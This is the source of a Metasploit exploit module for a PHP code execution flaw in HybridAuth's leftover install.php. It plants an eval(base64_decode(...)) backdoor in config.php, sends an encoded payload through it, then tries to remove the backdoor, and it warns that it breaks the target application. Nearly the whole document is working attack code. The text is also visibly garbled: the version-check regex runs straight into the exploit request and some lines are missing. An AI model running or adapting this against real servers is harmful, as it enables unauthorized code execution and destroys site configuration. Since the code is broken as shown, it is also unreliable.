## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HybridAuth install.php PHP Code Execution', 'Description' => %q{ This module exploits a PHP code execution vulnerability in HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php' is not removed after installation allowing unauthenticated users to write PHP code to the application configuration file 'config.php'. Note: This exploit will overwrite the application configuration file rendering the application unusable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pichaya Morimoto', # Discovery and PoC 'Brendan Coles ' # Metasploit ], 'References' => [ ['EDB', '34273'], ['OSVDB','109838'] ], 'Arch' => ARCH_PHP, 'Platform' => 'php', 'Targets' => [ # Tested: # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu) ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Aug 4 2014', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/']) ], self.class) end # # Check: # * install.php exists # * config.php is writable # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2 # def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res vprint_error "#{peer} - Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 vprint_error "#{peer} - Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be WRITABLEHybridAuth (2\.[012]\.[\d\.]+(-dev)?) InstallerHybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*" ) if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ print_good "#{peer} - Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res print_warning "#{peer} - No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 print_good "#{peer} - Sent payload successfully" end # remove backdoor print_status "#{peer} - Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res print_error "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ print_good "#{peer} - Removed backdoor successfully" else print_warning "#{peer} - Could not remove payload from config.php" end end end